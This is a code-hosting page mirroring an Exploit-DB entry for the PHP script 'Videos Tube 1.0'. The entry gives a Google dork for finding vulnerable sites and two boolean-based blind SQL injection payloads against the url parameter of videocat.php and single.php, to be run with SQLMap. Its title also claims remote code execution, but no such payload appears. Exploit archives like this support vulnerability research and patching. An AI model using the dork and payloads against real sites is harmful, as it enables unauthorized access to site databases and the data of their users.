bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/33514.txt
Offensive Security 65f378afeb Updated 05_31_2014
2014-05-31 04:36:31 +00:00

16 lines
No EOL
713 B
Text
Executable file
Raw Blame History

# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0
Description (Aç?klama)
========================
Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.
Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)
Reference in a new issue View git blame Copy permalink